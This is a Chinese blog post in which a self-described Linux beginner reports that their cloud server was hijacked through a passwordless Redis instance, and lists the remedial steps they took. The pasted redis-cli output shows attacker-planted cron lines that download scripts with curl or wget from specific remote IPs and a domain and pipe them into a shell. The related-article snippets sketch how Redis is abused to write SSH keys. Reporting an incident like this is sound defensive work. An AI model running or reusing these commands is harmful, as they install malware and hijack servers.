Redis 阿里云服务器遭遇攻击

最新推荐文章于 2024-05-15 11:40:15 发布
最新推荐文章于 2024-05-15 11:40:15 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: 中间件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mrathena/article/details/109851636
版权

博文目录

文章目录

攻击提醒

在这里插入图片描述
通过描述来看, 我的服务器被挂马, 一直在尝试攻击别人服务器的6379端口, 阿里云一定时限内禁止我访问其他服务器的6379端口

我估计是因为我的Redis使用了默认的6379端口, 且没有设置密码, 且开放了一堆端口到公网, 且使用的是root账户, 被人扫到了, 然后通过漏洞做了不好的事情, 我是Linux小白, 只能百度看看有什么查漏补缺的措施了

查看异常

执行top发现有两个进程占用了较高的cpu资源, 几乎100%, 一个是 system-xxxx(忘了), 一个是crond, 分别是干嘛的, 我也不清楚

然后看 Redis, 我启动了12个redis-server, 哨兵(一主两从三哨兵), 集群(三主三从), 检查了一下, 发现 6380(主, 服务正常) , 6381(从, 服务正常), 6379(从, 服务异常, 执行命令巨慢, 而且主从不能同步了)

6380

[/application/redis-5.0.10/mrathena]# ../src/redis-cli -p 6380
127.0.0.1:6380> keys *
1) "Back2"
2) "Back3"
3) "Back4"
4) "1"
5) "Back1"
127.0.0.1:6380> get 1
"\n\n*/1 * * * * cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh\n\n"
127.0.0.1:6380> get Back1
"\t\n*/20 * * * * root curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
127.0.0.1:6380> get Back2
"\t\n*/30 * * * * root wget http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"
127.0.0.1:6380> get Back3
"\t\n*/25 * * * * root cur -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
127.0.0.1:6380> get Back4
"\t\n*/50 * * * * root wge http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"
127.0.0.1:6380>

6379

[/application/redis-5.0.10/mrathena]# ../src/redis-cli -p 6379
127.0.0.1:6379> keys *
1) "backup3"
2) "backup4"
3) "backup1"
4) "backup2"
(2.30s)
127.0.0.1:6379> get backup1
"\n\n\n*/2 * * * * cd1 -fsSL http://198.98.57.187/hrh8rjmb95n8t7t/init.sh | sh\n\n"
(1.27s)
127.0.0.1:6379> get backup2
"\n\n\n*/3 * * * * wget -q -O- http://198.98.57.187/hrh8rjmb95n8t7t/init.sh | sh\n\n"
(3.59s)
127.0.0.1:6379> get backup3
"\n\n\n*/4 * * * * curl -fsSL http://185.232.65.191/hrh8rjmb95n8t7t/init.sh | sh\n\n"
(3.92s)
127.0.0.1:6379> get backup4
"\n\n\n*/5 * * * * wd1 -q -O- http://185.232.65.191/hrh8rjmb95n8t7t/init.sh | sh\n\n"
127.0.0.1:6379>

6381

[/application/redis-5.0.10/mrathena]# ../src/redis-cli -p 6381
127.0.0.1:6381> keys *
1) "1"
2) "Back4"
3) "Back2"
4) "Back1"
5) "Back3"
127.0.0.1:6381> get 1
"\n\n*/1 * * * * cur -fsSL http://45.9.148.37/E5DB0E07C3D7BE80V201007/init.sh |sh\n\n"
127.0.0.1:6381> get Back1
"\t\n*/20 * * * * root curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
127.0.0.1:6381> get Back2
"\t\n*/30 * * * * root wget http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"
127.0.0.1:6381> get Back3
"\t\n*/25 * * * * root cur -fsSL http://d.powerofwish.com/pm.sh | sh\n\t"
127.0.0.1:6381> get Back4
"\t\n*/50 * * * * root wge http://d.powerofwish.com/pm.sh -O .p && bash .p\n\t"
127.0.0.1:6381>

补救操作

系统操作

删除阿里云所有IP可访问22端口的入向安全组规则, 添加自己IP可访问22端口的入向安全组规则, 虽然攻击者可能已经在系统中添加了SSH密钥可以访问系统, 但是添加IP限制后, 应该也登录不上来了

另外添加的其他定时任务等东西还不确认有没有, 有也不知道该怎么操作

Redis添加密码认证

哨兵和集群全都重新配置密码 requirepass 和 masterauth

也可以给开放的Redis端口的入向安全组规则添加IP限制, 但是我配置了密码, 为了方便学习使用, 也懒得配置IP限制了

残留问题

我还是会时不时收到系统因攻击其他服务器6379端口而被临时限制的信息通知, 暂时我也不清楚该怎么处理, 先这样吧

20201206

服务器突然不能使用 ll, ls, vim, cd, 等基本命令了, 不得已停机重置了, 公私网ip都没变, 防火墙入向规则也都还在

mrathena
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6265
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
Redis漏洞?阿里攻击
weixin_34326179的博客
08-26 195
今天运维那边过来说阿里云服务器进程被占用很多,后来查了一下进程发现了这个玩意: 小编我看不懂,经运维先森仔细研究,发现这是被注入进来的一个进程,服务器被当成了肉鸡,专门用来跑比特币的,这样对方就不需要有很多服务器,从而节省了成本,也是醉了 那问题是什么呢,那就是redis的问题,redis可以不使用密码来登录,就可以直接操作,那么只要添加密码就行了 redis做好密码配置,经过客户端的调...
服务器上Redis数据库被攻击实录+总结
最新发布
青衫客36的博客
05-15 1065
通过以上步骤,可以详细了解攻击过程,并采取有效的措施防止类似攻击的发生。增强 Redis 服务器和系统的安全性是关键,确保只有受信任的用户能够访问和管理服务器。计划任务格式:计划任务的格式是一个定时器表达式后跟执行命令。这条任务每 15 分钟执行一次curl命令下载并执行远程脚本。文件路径:攻击者将 Redis 配置为将数据持久化到cron计划任务目录,如。这导致持久化的内容成为cron守护进程的一部分计划任务。持久化机制的滥用:通过 Redis 的SAVE。
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3887
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
【实战记录】记录服务器遭到攻击全过程(Redis漏洞)
qq_41997592的博客
02-13 3429
第一次面对服务器攻击全过程,由被动到主动!!
记一次redis服务器被攻击的体验
xyffly的博客
03-13 1446
前几天查看了自己的服务器,发现被异常登录了,阿里也发来了警告,赶紧登上去看了一下。        查看了一下检查/root/.ssh/下有没有秘钥文件,发现果然有一个公钥文件。                  先把他删除。1)禁止使用 root 权限启动 redis 服务2)对 redis 访问启用复杂密码认证,并且添加 IP 访问限制3)尽可能不对公网直接开放 SSH 服务4)并且关掉nt...
redis攻击
xiaopzi的博客
01-08 1390
2 /www/server/redis下多了一个root文件 具体文件放在被上传工具文件里。之前由于redis没有修改端口,密码也比较简单,也没有绑定ip 结果被攻击了。3 去把主库的rdb文件和aof文件删下防止用这个数据恢复。我的在appendonly.aof文件里看到了以下命令。这个pm.sh脚本被放在被上传工具文件里。
Redis阿里云服务器上的安装与使用
01-09
1.远程连接阿里云服务器 2.安装Redis apt install redis-server 3.修改配置信息 (由于Redis在阿里默认是不开启的,因为redis-server 默认配置绑定的 IP 是 IPv6, 操作系统模式 IP v4) 进入redis  进入vim...
阿里云服务器安装配置redis的方法并且加入到开机启动(推荐)
09-09
在本文中,我们将详细介绍如何在阿里云服务器上安装和配置Redis,并将其设置为开机启动服务。Redis是一款开源的键值存储系统,常用于数据库、缓存和消息中间件,其高性能和灵活性使其在IT领域广泛应用。 1. **安装...
阿里Redis开发规范1
08-03
阿里Redis开发规范1主要关注键值设计、命令使用、客户端使用等方面,旨在优化Redis的使用,提高系统性能,防止潜在的问题。 1. 键值设计: - 建议使用业务名称作为前缀,避免键冲突,例如`业务名:表名:id`。 - ...
阿里 Redis 开发规范
01-07
本文主要介绍在使用阿里 Redis 的开发规范,从下面几个方面进行说明。 键值设计 命令使用 客户端使用 相关工具 通过本文的介绍可以减少使用 Redis 过程带来的问题。 一、键值设计 1、key 名设计 可读性和可管理性 ...
阿里Redis开发规范
05-08
本⽂文介绍了了在使⽤用阿⾥里里Redis的开发规范,从键值设计、命令使⽤用、客户端使⽤用、相关 ⼯工具等⽅方⾯面进⾏行行说明,通过本⽂文的介绍可以减少使⽤用Redis过程带来的问题。
redis安全攻防(专注渗透视角)
LainWith的博客
04-11 2938
数据库作为业务平台信息技术的核心和基础,承载着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,数据库的安全稳定运行也直接决定着业务系统能否正常使用。并且平台的数据库中往往储存着等极其重要和敏感的信息。这些信息一旦被篡改或者泄露,轻则造成企业经济损失,重则影响企业形象,甚至行业、社安全。可见,数据库安全至关重要。所以对数据库的保护是一项必须的,关键的,重要的工作任务。
服务器搭建redis后,出现攻击外部ip行为
weixin_42246822的博客
03-06 1517
服务器搭建redis后,出现攻击外部ip行为 根据异常特征初步判断主机疑似因redis未授权访问漏洞被入侵,由于主机入侵较为严重,系统已不可信任,为防止黑客在主机内留有其他后门,建议备份业务数据,择机重装系统,并对redis进行安全加固。
记一次阿里云服务器Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
热门推荐
董哥的黑板报
05-15 1万+
一、事情缘由 前段时间给大家录制《玩转Docker》教学视频,链接请参阅https://www.bilibili.com/video/BV1BK4y1A78M,为了更好的演示,就在阿里搞了一个服务器,自己本地连接。 服务器到手之后,为了可以让自己本地可以连接到阿里云服务器上就做了如下操作: 开放了ssh(port:22)端口:为了远程连接使用。 开放了剩余的其他所有端口:录制教学视频时启动了相关容器,容器的一些固定端口6379等映射到了宿主机的随机端口上,为了能从公网访问到容器的内容,就开放
阿里云服务器因为Redis漏洞收到攻击解决方案
striveb的博客
08-08 1678
由于Redis监听在公网,并且没有进行认证,所以很容易被黑客侵入。参照几篇博客。 http://blog.jobbole.com/94518/ https://blog.csdn.net/tjcyjd/article/details/54140321 https://blog.csdn.net/hu_wen/article/details/51908597 https://blog.csd...
redis服务器被攻击,服务器CentOS Linux release 7.6.1810 (Core)
qq_35456400的博客
06-23 1801
没想到这么容易被攻击了,密码是简单密码,端口号是默认的6379。可能太容易被破解了,换了下端口号还是不行。第二天sentinel的大量报这个错。 2738:X 23 Jun 2020 15:28:24.004 * +fix-slave-config slave 127.0.0.1:5480 127.0.0.1 5480 @ mymonitor 127.0.0.1 5479 2738:X 23 Jun 2020 15:28:34.104 * +fix-slave-config slave 127.0.0..
记一次阿里Redis服务器被入侵的经历
qq_25968703的博客
06-02 3680
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
阿里ECS-Centos7.9集群部署Redis服务遭木马攻击
lilyliu2535的博客
12-23 2939
阿里ECS-Centos7.9集群部署Redis服务遭木马攻击 #背景 阿里ECS-Centos7.9集群:hadoop202,hadoop203,hadoop204 hadoop202启动redis-server服务 redis.conf配置 #bind 127.0.0.1 protected-mode no #requirepass hadoop202,hadoop203,hadoop204配置了免密 #遭木马入侵,3台机器 CPU占用高 ~/.ssh/authorized_keys遭篡改 cron
阿里云服务器安装redis
05-26
阿里云服务器上安装Redis,可以按照以下步骤进行: 1. 登录到服务器 使用SSH登录到服务器。 2. 下载Redis 可以从Redis官网下载最新版本的Redis源码包,并上传到服务器。 3. 解压Redis 在服务器上解压Redis...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值